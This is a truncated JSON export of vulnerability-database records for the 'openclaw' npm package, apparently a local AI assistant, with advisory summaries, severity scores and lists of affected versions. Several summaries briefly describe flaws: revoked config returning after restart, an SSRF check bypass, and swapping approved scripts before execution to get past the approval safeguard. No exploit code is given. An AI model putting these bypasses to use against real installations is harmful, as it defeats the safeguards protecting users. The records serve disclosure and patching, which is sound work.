ID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-2j53-2c28-g9v2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z3rc-xpx7-fkcu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90164?format=json","vulnerability_id":"VCID-z7wa-tw2t-vqas","summary":"OpenClaw: Tlon Startup Migration Rehydrates Empty-Array Revocations From File Config\n## Summary\nTlon Startup Migration Rehydrates Empty-Array Revocations From File Config\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: v2026.3.28 startup migration still treats empty-array settings as missing and can rehydrate revoked Tlon config from file state after restart.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a4d72a83f01fedd35964c352e3473c7712a3511b` — 2026-03-31T14:57:03+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41388","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12844","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12883","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12878","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41388"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a4d72a83f01fedd35964c352e3473c7712a3511b","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:28:29Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a4d72a83f01fedd35964c352e3473c7712a3511b"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3pm9-5j7m-59vc","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:28:29Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3pm9-5j7m-59vc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41388","reference_id":"CVE-2026-41388","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41388"},{"reference_url":"https://github.com/advisories/GHSA-3pm9-5j7m-59vc","reference_id":"GHSA-3pm9-5j7m-59vc","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3pm9-5j7m-59vc"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-configuration-rehydration-via-empty-array-revocation-handling","reference_id":"openclaw-configuration-rehydration-via-empty-array-revocation-handling","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:28:29Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-configuration-rehydration-via-empty-array-revocation-handling"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41388","GHSA-3pm9-5j7m-59vc"],"risk_score":3.0,"exploitability":"0.5","weighted_severity":"5.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z7wa-tw2t-vqas"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90293?format=json","vulnerability_id":"VCID-z8mj-pnbe-wqej","summary":"OpenClaw has Browser SSRF Policy Bypass via Interaction-Triggered Navigation\n## Impact\n\nBrowser SSRF Policy Bypass via Interaction-Triggered Navigation.\n\nBrowser interactions could trigger navigations that bypassed the normal SSRF navigation checks.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.5`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @ccreater222 and @KeenSecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41912","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10088","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10102","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10118","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41912"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vr5g-mmx7-h897","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vr5g-mmx7-h897"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41912","reference_id":"CVE-2026-41912","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41912"},{"reference_url":"https://github.com/advisories/GHSA-vr5g-mmx7-h897","reference_id":"GHSA-vr5g-mmx7-h897","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vr5g-mmx7-h897"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-41912","GHSA-vr5g-mmx7-h897"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z8mj-pnbe-wqej"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91563?format=json","vulnerability_id":"VCID-z8sm-pm9t-wyhu","summary":"Duplicate Advisory: OpenClaw: Unbound interpreter and runtime commands could bypass node-host approval integrity\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-xf99-j42q-5w5p. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.11 contains an approval integrity vulnerability allowing attackers to execute rewritten local code by modifying scripts between approval and execution when exact file binding cannot occur. Remote attackers can change approved local scripts before execution to achieve unintended code execution as the OpenClaw runtime user.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xf99-j42q-5w5p","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xf99-j42q-5w5p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32979","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32979"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unbound-interpreter-and-runtime-commands-bypass-in-node-host-approval","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unbound-interpreter-and-runtime-commands-bypass-in-node-host-approval"},{"reference_url":"https://github.com/advisories/GHSA-wmgj-hrx3-23gj","reference_id":"GHSA-wmgj-hrx3-23gj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wmgj-hrx3-23gj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-